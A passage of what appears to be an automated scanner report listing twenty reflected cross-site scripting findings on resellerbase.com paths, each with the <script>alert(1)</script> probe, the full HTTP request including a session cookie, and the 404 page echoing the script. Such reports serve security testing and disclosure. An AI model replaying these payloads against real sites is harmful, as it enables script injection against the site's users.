2.2569. http://www.resellerbase.com/detail/38/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e932f<script>alert(1)</script>87122a2f39 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themese932f<script>alert(1)</script>87122a2f39/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themese932f<script>alert(1)</script>87122a2f39/ was not found on this server.</p>
...[SNIP]...

2.2570. http://www.resellerbase.com/detail/38/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1ffb7<script>alert(1)</script>2785ffce704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/?1ffb7<script>alert(1)</script>2785ffce704=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/?1ffb7<script>alert(1)</script>2785ffce704=1 was not found on this server.</p>
...[SNIP]...

2.2571. http://www.resellerbase.com/detail/38/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9dbae<script>alert(1)</script>a838fefbc46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9dbae<script>alert(1)</script>a838fefbc46/38/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9dbae<script>alert(1)</script>a838fefbc46/38/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2572. http://www.resellerbase.com/detail/38/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0aca<script>alert(1)</script>454f7bd597e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38e0aca<script>alert(1)</script>454f7bd597e/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38e0aca<script>alert(1)</script>454f7bd597e/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2573. http://www.resellerbase.com/detail/38/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e60fe<script>alert(1)</script>5e224d7fb1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themese60fe<script>alert(1)</script>5e224d7fb1e/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themese60fe<script>alert(1)</script>5e224d7fb1e/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2574. http://www.resellerbase.com/detail/38/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4e762<script>alert(1)</script>44122a4b1e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos4e762<script>alert(1)</script>44122a4b1e5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos4e762<script>alert(1)</script>44122a4b1e5/ was not found on this server.</p>
...[SNIP]...

2.2575. http://www.resellerbase.com/detail/38/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3ea0c<script>alert(1)</script>da23178c3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/?3ea0c<script>alert(1)</script>da23178c3b1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/?3ea0c<script>alert(1)</script>da23178c3b1=1 was not found on this server.</p>
...[SNIP]...

2.2576. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31a29<script>alert(1)</script>2c68ba960a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail31a29<script>alert(1)</script>2c68ba960a0/38/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail31a29<script>alert(1)</script>2c68ba960a0/38/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2577. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a94b8<script>alert(1)</script>cfc0d865df1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38a94b8<script>alert(1)</script>cfc0d865df1/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38a94b8<script>alert(1)</script>cfc0d865df1/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2578. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1dfba<script>alert(1)</script>5582ba47c3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes1dfba<script>alert(1)</script>5582ba47c3d/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes1dfba<script>alert(1)</script>5582ba47c3d/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2579. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2c3c<script>alert(1)</script>8d0a468788d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmosb2c3c<script>alert(1)</script>8d0a468788d/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmosb2c3c<script>alert(1)</script>8d0a468788d/images/ was not found on this server.</p>
...[SNIP]...

2.2580. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88244<script>alert(1)</script>4b7f5e68edc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images88244<script>alert(1)</script>4b7f5e68edc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images88244<script>alert(1)</script>4b7f5e68edc/ was not found on this server.</p>
...[SNIP]...

2.2581. http://www.resellerbase.com/detail/38/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59d55<script>alert(1)</script>5a11c5ef10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/?59d55<script>alert(1)</script>5a11c5ef10=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/?59d55<script>alert(1)</script>5a11c5ef10=1 was not found on this server.</p>
...[SNIP]...

2.2582. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b26c<script>alert(1)</script>20ea91f80fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2b26c<script>alert(1)</script>20ea91f80fc/38/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2b26c<script>alert(1)</script>20ea91f80fc/38/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2583. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26626<script>alert(1)</script>95fddebccd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3826626<script>alert(1)</script>95fddebccd/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3826626<script>alert(1)</script>95fddebccd/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2584. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 657d0<script>alert(1)</script>7d79a398a41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes657d0<script>alert(1)</script>7d79a398a41/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes657d0<script>alert(1)</script>7d79a398a41/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2585. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c1594<script>alert(1)</script>a968496bc4e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmosc1594<script>alert(1)</script>a968496bc4e/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmosc1594<script>alert(1)</script>a968496bc4e/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2586. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1c22e<script>alert(1)</script>6f82651162 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images1c22e<script>alert(1)</script>6f82651162/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images1c22e<script>alert(1)</script>6f82651162/rating/ was not found on this server.</p>
...[SNIP]...

2.2587. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bd570<script>alert(1)</script>b0913e90074 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/ratingbd570<script>alert(1)</script>b0913e90074/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/ratingbd570<script>alert(1)</script>b0913e90074/ was not found on this server.</p>
...[SNIP]...

2.2588. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e8ce<script>alert(1)</script>c8f7d3eba83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/?7e8ce<script>alert(1)</script>c8f7d3eba83=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/?7e8ce<script>alert(1)</script>c8f7d3eba83=1 was not found on this server.</p>
